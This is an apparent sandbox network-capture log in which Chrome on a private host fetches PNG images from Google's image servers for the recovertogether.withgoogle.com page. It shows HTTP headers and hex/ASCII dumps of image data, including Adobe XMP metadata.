                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC660INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 5c 54 db 6e 53 41 0c 7c ef 57 ac 0e cf 6c d6 f6 da 5e a3 a6 12 1c c4 1b 3f c0 1b a2 a1 89 14 d2 aa 0d 4d 3f 9f f1 49 03 15 52 a4 93 59 7b 7d 19 8f f7 fa e9 f9 ae 9c 76 b7 c7 ed 7a e2 3e 95 ed 66 77 b7 3d 9e ff 3f ef 36 a7 4f f7 2f eb a9 95 56 b8 e3 37 95 9f bb fd 7e 3d 1d ee 0f 9b a9 bc fc da 1f 9e d6 d3 f6 78 7c f8 b0 5a 9d 4e a7 7a 92 7a ff 78 b7 e2 d6 da 0a 81 a7 9b ab eb 87 ef c7 ed 72 eb fd e3 ef fd 66 3d 6d 9e 37 87 fb db db a9 fc d8 ef 1e fe 3f bb 5d 4f 5f 99 6a 44 8c a2 35 fa d0 19 90 4d a2 58 65 1f 11 85 5b ed 2e 0c ac 8d bb 14 8a 6a 5d 08 d8 1a 0f 9e d3 1e 4d 80 db 18 56 70 9d 3a 21 18 7b a7 91 b0 e3 7a e9 55 9a 44 3a 9b 76 05 f4 d1 88 32 98 bb 75 b8 13 eb f0 42 a3 8e 4e 0e 2c c4 6c 33 70 0b c9 eb da ba c1 ee b5 b1
                                                                                                                                                                                                                                                                                          Data Ascii: \TnSA|Wl^?M?IRY{}vz>fw=?6O/V7~=x|ZNzzxrf=m7?]O_jD5MXe[.j]MVp:!{zUD:v2uBN,l3p


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          93192.168.2.749860142.250.184.2254435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC802OUTGET /C-3n9JWip1MhvjSOHobQZ_LIR0vFDS9XtRCeluAgkojyN42e40hd4UCOQ_ZLrLPQbR3VUeNy_z-H3-DGwqKubSyroa6-rgSforT48kag=w1280-h720-pp HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 907209
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:09:59 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:09:59 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 1899
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC857INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 02 00 00 00 40 1f 4a 01 00 00 0c 38 69 43 43 50 69 63 63 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 40 68 a1 4b 09 bd 09 22 35 80 94 10 5a e8 1d 41 54 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 41 11 c5 c2 a2 d8 fb 62 41 45 59 17 0b 76 e5 4d 0a e8 ba af 7c 6f be 6f ee fc f7 9f 33 ff 39 73 ee dc 3b 77 00 50 3b c1 11 89 f2 50 75 00 f2 85 85 e2 b8 90 00 fa d8 94 54 3a e9 29 20 03 65 40 00 c6 c0 9a c3 2d 10 31 63 62 22 00 2c 43 ed df cb bb eb 00 91 b6 57 1c a4 5a ff ec ff af 45 83 c7 2f e0 02 80 c4 40 9c c1 2b e0 e6 43 7c 10 00 bc 8a 2b 12 17 02 40 94 f2 e6 53 0a 45 52 0c 2b d0 12 c3 00 21 5e 28 c5 59 72 5c 25 c5 19 72 bc 57 66 93 10 c7 82 b8 0d 00 25 15 0e 47
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR@J8iCCPiccHWXS[@hK"5ZATB A.*v]QbAbAEYvM|oo39s;wP;PuT:) e@-1cb",CWZE/@+C|+@SER+!^(Yr\%rWf%G
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: c6 70 be 59 c3 3d 3f fb 67 fd 90 7d 1e 6c c3 7f b6 c4 16 62 07 b0 76 ec 24 76 0e 3b 8a 35 02 3a d6 82 35 61 1d d8 31 29 1e 5e 5d 8f 65 ab 6b c8 5b 9c 2c 9e 5c a8 23 f8 87 bf a1 27 2b cd 64 81 53 ad 53 af d3 17 79 5f 21 7f aa f4 1b 0d 58 93 44 d3 c4 82 ac ec 42 3a 13 ee 08 7c 3a 5b c8 75 1c 49 77 76 72 76 01 40 ba bf c8 3f 5f 6f 62 65 fb 06 a2 d3 f1 9d 9b f7 07 00 3e 2d 83 83 83 47 be 73 61 2d 00 ec f3 80 af ff e1 ef 9c 0d 03 6e 1d ca 00 9c 3d cc 95 88 8b e4 1c 2e bd 10 e0 57 42 0d be 69 fa 70 ef 32 07 36 70 3e ce c0 1d 78 03 7f 10 04 c2 40 34 48 00 29 60 02 8c 3e 1b ae 73 31 98 02 66 80 b9 a0 14 94 83 65 60 35 58 0f 36 81 ad 60 27 d8 03 f6 83 46 70 14 9c 04 67 c0 05 70 09 5c 03 77 e0 ea e9 01 2f 40 3f 78 07 3e 23 08 42 42 a8 08 0d d1 47 4c 10 4b c4 1e 71
                                                                                                                                                                                                                                                                                          Data Ascii: pY=?g}lbv$v;5:5a1)^]ek[,\#'+dSSy_!XDB:|:[uIwvrv@?_obe>-Gsa-n=.WBip26p>x@4H)`>s1fe`5X6`'Fpgp\w/@?x>#BBGLKq
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: c7 5e 48 31 48 11 a4 34 a5 92 52 93 52 b7 a7 0e 8c 0b 1a b7 7a 5c 4f 9a 5b 5a 69 da f5 f1 d6 e3 a7 8e 3f 37 c1 60 42 de 84 63 13 d5 26 72 26 1e 48 27 a4 27 a7 ef 4a ff c2 89 e6 54 73 06 32 d8 19 55 19 fd 5c 16 77 0d f7 05 cf 9f b7 8a d7 cb f7 e1 af e0 3f cd f4 c9 5c 91 f9 2c cb 27 6b 65 56 6f b6 5f 76 45 76 9f 80 25 58 2f 78 95 13 9a b3 29 e7 7d 6e 74 ee 8e dc c1 bc e4 bc fa 7c a5 fc f4 fc c3 42 4d 61 ae b0 6d 92 f1 a4 a9 93 ba 44 f6 a2 52 51 f7 64 af c9 ab 27 f7 8b c3 c5 db 0b 90 82 f1 05 4d 85 5a f0 47 be 43 62 23 f9 45 f2 a0 c8 b7 a8 b2 e8 c3 94 a4 29 07 a6 6a 4c 15 4e ed 98 66 37 6d d1 b4 a7 c5 c1 c5 bf 4d c7 a7 73 a7 b7 ce 30 9d 31 77 c6 83 99 cc 99 5b 66 21 b3 32 66 b5 ce 36 9f 3d 7f 76 cf 9c 90 39 3b e7 52 e6 e6 ce fd bd c4 a9 64 45 c9 db 79 c9 f3
                                                                                                                                                                                                                                                                                          Data Ascii: ^H1H4RRz\O[Zi?7`Bc&r&H''JTs2U\w?\,'keVo_vEv%X/x)}nt|BMamDRQd'MZGCb#E)jLNf7mMs01w[f!2f6=v9;RdEy
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: b4 a6 a8 aa 08 37 01 14 4b a4 a4 22 41 a9 e8 b1 c6 aa d5 ea 2a 5a 1d 91 28 aa 55 28 2c 60 77 13 60 11 02 eb 02 c0 2a 10 05 7c a1 48 89 f0 f0 b2 a0 26 6b 11 50 5b f7 09 38 ab 95 64 0b aa 02 0a 68 88 90 54 65 fd 21 c9 33 8e 59 e0 16 d0 a3 eb 04 51 28 49 c5 02 28 6e 4a 10 a5 06 69 7d 3d 72 82 c2 12 d5 2d 14 c8 e6 66 a3 1f f9 91 50 25 a9 7b 83 14 d0 52 61 b5 74 b4 9f 2f 94 e5 05 be 17 60 74 02 7f 53 6c d1 26 4d 2c 80 dd 5d 45 62 ed bd 8f da 69 6d 70 4b 28 15 b4 c5 ed 75 0c 80 60 43 c0 22 aa d9 14 80 85 73 35 40 25 48 00 d9 ed c9 1a 7b a3 0d aa 44 51 ea bd 37 f3 f2 1d 71 ef 88 99 07 0c 24 1b 20 48 f4 fd 98 06 df 21 59 1e fa a6 28 80 dc dd 22 4a ba 25 41 25 0a ba d5 2d 91 15 3b 02 de 19 61 8a 99 86 86 ba 7b b7 da a6 31 77 ec e1 85 ff 05 78 ef ad 6e 91 6d 5b 09
                                                                                                                                                                                                                                                                                          Data Ascii: 7K"A*Z(U(,`w`*|H&kP[8dhTe!3YQ(I(nJi}=r-fP%{Rat/`tSl&M,]EbimpK(u`C"s5@%H{DQ7q$ H!Y("J%A%-;a{1wxnm[
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 85 62 51 20 0c 30 ce 6f 15 eb ea 37 65 c9 a3 4c 09 08 95 e9 81 6c 5c c1 c7 59 f8 cb 72 0d 4f f8 f0 c7 49 f2 6a 02 c6 23 09 0b bc 6f 0f 66 1b 20 8b 2d 10 5a 44 1b 5d 5b 78 9b e6 9e 65 d3 10 58 16 90 14 d8 a6 11 8c ee f6 bd 12 3d 83 c6 b5 8e c5 05 50 24 d6 e2 2c 19 46 2f d6 7c b2 c4 81 b3 e7 43 5b c3 82 d1 6a 17 89 2a a9 ab db f8 bf a5 65 b8 11 1f 27 04 5c 0d 2d 00 b4 2a 11 59 c0 06 81 5e 82 ec ff 80 16 02 ea 24 23 84 03 6a 75 b7 f6 80 52 b5 bf 60 23 f6 85 2a eb 26 56 5c 78 6f 37 30 21 42 10 d4 aa 55 02 ba d1 7b 4b 04 4a 85 56 99 30 41 80 b6 e7 16 22 b4 c8 6e 13 00 3f 52 37 51 0d 5d c2 8d 2a 68 61 af ea 55 6c 50 bd 0b e3 1d cd 73 99 f7 b6 da b7 08 b2 94 53 56 d1 70 6a 11 1d d1 93 ec b0 eb ee b5 4b d4 de 1b 14 89 9f df df 75 ad af e2 9f 7f 16 08 b2 59 60 f1
                                                                                                                                                                                                                                                                                          Data Ascii: bQ 0o7eLl\YrOIj#of -ZD][xeX=P$,F/|C[j*e'\-*Y^$#juR`#*&V\xo70!BU{KJV0A"n?R7Q]*haUlPsSVpjKuY`
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: d5 f0 47 4f 8e d3 27 86 47 c5 39 1c ed 05 a0 d9 37 17 24 8c 0b 7d b5 ba 75 a3 88 36 b3 d2 2e 36 16 d9 c4 0d 63 6e f5 e2 bd aa a1 dd a8 06 d5 22 ee 5a 57 75 78 4e f7 dd 00 58 58 20 ef 6e 48 cd ea cc 0f 43 c4 a2 c7 aa 5b 10 6b c1 12 22 74 a1 ba 45 aa d5 dd d8 be 76 d5 bf fe 9f 3f 4b 8e 56 b0 b8 48 a2 45 d5 cf eb fe fa ba ba c9 05 14 b5 37 d7 98 66 82 bd b8 58 5c e1 12 e8 40 c1 60 2f 5f 0b 28 8f d2 41 2c 65 2f 8b a9 47 18 17 43 f0 24 99 1b 1d ee 22 a8 3a 70 e6 44 51 eb 60 09 1d 01 0c dc e2 f8 7d aa a1 59 22 31 dc 63 56 7d 55 da d7 52 6c 33 1d af b3 d1 4c 6c be f5 80 d5 60 b3 cb eb 14 f1 63 19 4c 25 c2 8e 5c 04 43 86 8f a2 f1 ba a8 2c 1c cd 02 83 7d 3b c3 4d 6a 92 3c 80 1e ca 80 09 9b e6 f6 0c ba c0 8e 87 2f 6c e9 28 da e8 5e 02 72 60 cb 60 b9 39 6e 18 a2 88
                                                                                                                                                                                                                                                                                          Data Ascii: GO'G97$}u6.6cn"ZWuxNXX nHC[k"tEv?KVHE7fX\@`/_(A,e/GC$":pDQ`}Y"1cV}URl3Ll`cL%\C,};Mj</l(^r``9n
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: ea fc 28 8e 0c 87 64 9e e5 36 0a ae 1b 5e b3 76 24 59 40 30 94 c8 77 51 2a 67 49 4e 2e 74 64 c8 58 c4 0e c2 9e 0c e5 10 2f 03 9d 32 a3 36 cc 7c 39 54 90 e5 d1 28 8b 49 3d c3 13 4b 15 0a ed e1 2d 82 3c e9 c1 81 0f 35 f8 68 f2 75 a4 19 0e ce d5 ec c5 3a ba 8e 63 19 cd c0 b9 a3 d6 16 4e 36 4f e6 c8 e9 e2 88 9b ef 28 a6 2c 49 d8 34 2b 39 15 43 b1 ad 4e 91 04 90 60 a2 28 95 a1 71 f6 6f 8c 5e 1f 70 07 ce 98 db e2 1c 1d 68 2f 5f 61 1c 1a 08 33 1f cc 34 24 e4 64 b1 42 a5 38 71 1e 13 a2 3b 7c d1 1e b0 a0 db 27 35 81 13 02 22 9d 41 7d e6 11 b3 88 73 4b 0d 11 6d 81 ae 58 0b cd 83 cf 63 02 03 6b 71 fe 9a a1 3d d9 db 33 3c c7 0b 60 1f 56 ce c1 7e 86 c8 ab a9 c6 07 12 e5 84 f1 d7 39 b5 86 d1 b0 91 b0 3a 63 77 34 af 82 f7 90 67 8f 3f b8 41 ab ca 8c 3f ad 79 01 70 83 4d
                                                                                                                                                                                                                                                                                          Data Ascii: (d6^v$Y@0wQ*gIN.tdX/26|9T(I=K-<5hu:cN6O(,I4+9CN`(qo^ph/_a34$dB8q;|'5"A}sKmXckq=3<`V~9:cw4g?A?ypM
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 72 e7 2b 69 23 f4 64 2b d5 cf 45 d7 28 31 39 32 b5 08 76 ef 7d 30 ee 04 75 11 2e 86 56 f4 b7 3d bc ac aa 7a 65 cd 0e e8 ca 43 c4 42 b6 80 56 11 f6 dd 87 f0 b5 97 cd 19 f8 27 51 71 4e 74 a8 87 ed 9d 64 f7 fd a8 57 c6 bb 34 2a d0 64 93 6a 0a 42 09 ad 62 35 11 0f 62 09 da fe 99 c4 c9 a7 1d c1 98 5a c9 04 00 67 32 a2 e4 d5 c0 ae e3 80 1e d3 2a a8 b8 13 26 89 f4 6a e8 bd 1a 4a 12 57 5d 46 6a ab 8a bc c0 25 2e b4 eb 0e 0e 4f 00 e7 dc 53 17 af c3 ba 27 4d dc 4b a5 3c f6 1c 16 1e c2 ed 34 e4 33 8c a3 9e 86 af e5 dc 11 f1 ac e9 49 90 3e e3 2d 1d ca 6d dd 09 c0 6e 7f 90 a5 d5 b4 c3 73 4c 27 27 62 ca 66 d4 db 11 76 9c d2 5f ea 99 a7 40 88 c7 fa 86 5c 0a 98 9a 43 df 58 43 fd 52 01 ed a0 37 23 13 02 7e 0a b7 a7 06 92 b0 69 17 ad a4 de 04 58 85 2e c1 75 3a 62 67 0d 5f
                                                                                                                                                                                                                                                                                          Data Ascii: r+i#d+E(192v}0u.V=zeCBV'QqNtdW4*djBb5bZg2*&jJW]Fj%.OS'MK<43I>-mnsL''bfv_@\CXCR7#~iX.u:bg_
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 17 99 81 ec f8 f9 ab 41 53 59 37 7f c8 0d 64 01 f6 20 7e 0b 7f f3 e4 b6 e2 38 b6 0f c8 16 c5 76 c3 2e 69 e0 32 c7 67 11 48 18 a2 1b 64 7d f0 b4 d3 a9 04 2d 0c a4 0e bf f6 a9 18 24 64 11 f8 8c c3 9d 18 f2 1b 56 75 04 25 0b 2f b6 fc e4 43 3c 23 19 60 11 d4 30 9c a7 99 06 74 5e 71 df e2 37 40 a2 5b 5d 94 b0 4f 31 26 b0 91 00 80 d0 0d ed 68 a5 1e 3f 57 cb c1 e1 e9 34 67 e7 84 2e 13 80 58 18 46 25 69 40 07 6d a6 8f fa c8 aa 7c 61 9a f3 84 cf 01 13 de 20 de 5f 1d 6b 90 f7 83 8d 06 7a c4 ea 2d a7 35 05 5a 0e 27 d6 54 80 78 0c 87 55 a5 93 66 91 93 7f 9f 9b 18 17 c3 c7 0d 7c b0 aa f3 d9 fb c3 bf 38 e0 97 83 0f 01 3e cf fe 7e cc 73 c0 fb b4 07 6d 3c 8e 12 9d 27 1e e1 44 06 e6 39 6c 28 21 00 4c 42 8e 2f 30 b0 f4 bf 7c e9 c8 dd 54 9d 34 87 3e ea 04 a1 23 cd 80 36 f9
                                                                                                                                                                                                                                                                                          Data Ascii: ASY7d ~8v.i2gHd}-$dVu%/C<#`0t^q7@[]O1&h?W4g.XF%i@m|a _kz-5Z'TxUf|8>~sm<'D9l(!LB/0|T4>#6
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: aa ff f2 e7 c8 cc 8f 7c bd 06 68 5c be e3 72 7d 5c 86 3e d0 61 61 8d 8f e4 3c 2c ce 33 fe dd c5 f3 c7 68 bf cf 1b f3 97 2e 06 b4 62 49 7e 89 ed 4f cd 1d 0b 53 2b 78 14 f2 c8 f0 e9 d4 fa 5c 6f 06 5d 03 60 df df f2 fc ef e8 b1 c3 7e cf b5 f0 2b e8 1c e4 fd 5e 3c e7 84 71 23 68 d1 82 fb 88 fb 39 f3 2a 2b 54 09 aa e9 a4 8a c9 06 19 e1 3b 71 9e 40 a1 bc 9b 81 7a 64 db f7 9d 60 ad e0 fd 8d f0 66 b9 f7 dd 7e 43 72 9a 3c f7 cf ef 9f f7 f7 bd 6f 33 5e ed ee de 7d 6f dd db 9d a0 fb 05 8f ce 3d 0c 13 3f f9 34 1b 49 8f e9 76 5f 68 49 a4 da 3e a2 71 d1 01 76 5d 1f 75 b5 bc e1 80 cb 95 5d 04 04 bb ed 89 8b fc ba be 80 4d 2c 77 b7 b2 49 ba ca f4 09 6b d5 55 cb 15 3a 8b 48 20 97 bc 56 2d 47 86 0b ab f8 a3 d6 55 6b 15 af 55 cb 3d 9f 88 ab 6a ad cb 65 b9 85 95 23 98 68 b0
                                                                                                                                                                                                                                                                                          Data Ascii: |h\r}\>aa<,3h.bI~OS+x\o]`~+^<q#h9*+T;q@zd`f~Cr<o3^}o=?4Iv_hI>qv]u]M,wIkU:H V-GUkU=je#h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          94192.168.2.749863142.250.184.2254435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC794OUTGET /ZbVcVI5gznupH4HWFYJkqkZnHDAC09j3j3LY1PG0DYacRBX2Pko8UhGbp9Y7bhb3DUROSOs-hort72vxN96ce6LxOkzZySbUTym6faGr=w2000 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: lh3.googleusercontent.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                                                                          Content-Disposition: inline;filename="unnamed.png"
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: fife
                                                                                                                                                                                                                                                                                          Content-Length: 1174944
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:10:00 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 28 Sep 2024 14:10:00 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                                                                          Age: 1898
                                                                                                                                                                                                                                                                                          ETag: "v1"
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC856INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 02 d0 08 06 00 00 00 cf 7d dd 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 f6 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 25 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 98 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 41 66 74 65 72 20 45 66 66 65 63 74 73 20 32 30 32 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 00 32 30 32 32 3a 30 39 3a 30 38 20 31 37 3a 30 30 3a 31 33 00 00 04 90 04 00 02 00 00 00 14 00 00 00 e2 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR}VsRGBeXIfMM*bj(1%r2iHHAdobe After Effects 2020 (Macintosh)2022:09:08 17:00:13
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 70 68 6f 74 6f 73 68 6f 70 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 70 68 6f 74 6f 73 68 6f 70 2f 31 2e 30 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 36 35 35 33 35 3c 2f 65 78 69 66 3a 43 6f 6c 6f 72 53 70 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 31 39 32 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 58 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 3c 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 31 30 38 30 3c 2f 65 78 69 66 3a 50 69 78 65 6c 59 44 69 6d 65 6e 73 69 6f 6e 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: obe.com/xap/1.0/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"> <exif:ColorSpace>65535</exif:ColorSpace> <exif:PixelXDimension>1920</exif:PixelXDimension> <exif:PixelYDimension>1080</exif:PixelYDimension>
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 20 20 20 20 3c 2f 72 64 66 3a 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 72 64 66 3a 53 65 71 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 78 6d 70 2e 64 69 64 3a 36 37 32 36 64 65 63 37 2d 38 30 36 30 2d 34 34 36 61 2d 38 66 39 37 2d 31 63 36 35 30 61 36 39 61 64 39 66 3c 2f 78 6d 70 4d 4d 3a 4f 72 69 67 69 6e 61 6c 44 6f 63 75 6d 65 6e 74 49 44 3e 0a 20 20 20 20 20 20 20 20 20 3c 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 63 63 36 63 64 37 38 39 2d 34 38 37 64 2d 37 62 34 63 2d 38 37 39 31 2d 62 30 33 34 31 38 35 33 33 62 36 65
                                                                                                                                                                                                                                                                                          Data Ascii: </rdf:li> </rdf:Seq> </xmpMM:History> <xmpMM:OriginalDocumentID>xmp.did:6726dec7-8060-446a-8f97-1c650a69ad9f</xmpMM:OriginalDocumentID> <xmpMM:DocumentID>adobe:docid:photoshop:cc6cd789-487d-7b4c-8791-b03418533b6e
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:38 UTC1390INData Raw: 13 2b 38 0f 5b 98 c1 d2 8b 10 39 73 dc 7e f2 06 9b a0 93 3f ef f8 45 1b 1c c6 dd a2 e6 43 db 7e ba d6 4e f0 92 89 72 63 03 66 6b 31 f5 c0 bc 27 f7 e1 60 ae d2 13 49 79 c1 92 d3 33 78 5f c4 29 9d 38 ed 78 c9 5e 19 43 3e b6 91 9f 51 20 9f 18 f8 13 c4 c4 03 db 88 ad c6 60 4d da ac 5b f8 f9 75 fc ee e8 7d 31 a7 77 ad 79 0b e6 ce 1b 7c fa f1 23 36 47 b6 1a 83 1b 2b 7c 89 5f 6a f5 61 5e e3 a9 a1 1e aa 81 ea fa 74 f5 b5 66 0c 99 a7 d8 16 ff 59 f7 28 67 7e 95 ed 3a d2 4d d8 28 a9 6b 59 ce 8d 31 a6 56 de 9e c9 cf 46 b9 22 8e d3 f0 90 77 8f 23 52 e8 45 60 05 da b5 a2 d2 41 25 a6 a3 7f fb e0 9f 54 5d 36 cf db bf 44 62 e0 58 9d 28 d2 43 a6 a0 e9 63 31 8f f0 2d 5d e8 38 fb b9 61 3d 76 82 cb 18 e5 a5 af c6 92 bc 48 3e e1 6b 7e 37 fe bb a7 69 ee e3 3d dd f9 49 be ff 48
                                                                                                                                                                                                                                                                                          Data Ascii: +8[9s~?EC~Nrcfk1'`Iy3x_)8x^C>Q `M[u}1wy|#6G+|_ja^tfY(g~:M(kY1VF"w#RE`A%T]6DbX(Cc1-]8a=vH>k~7i=IH
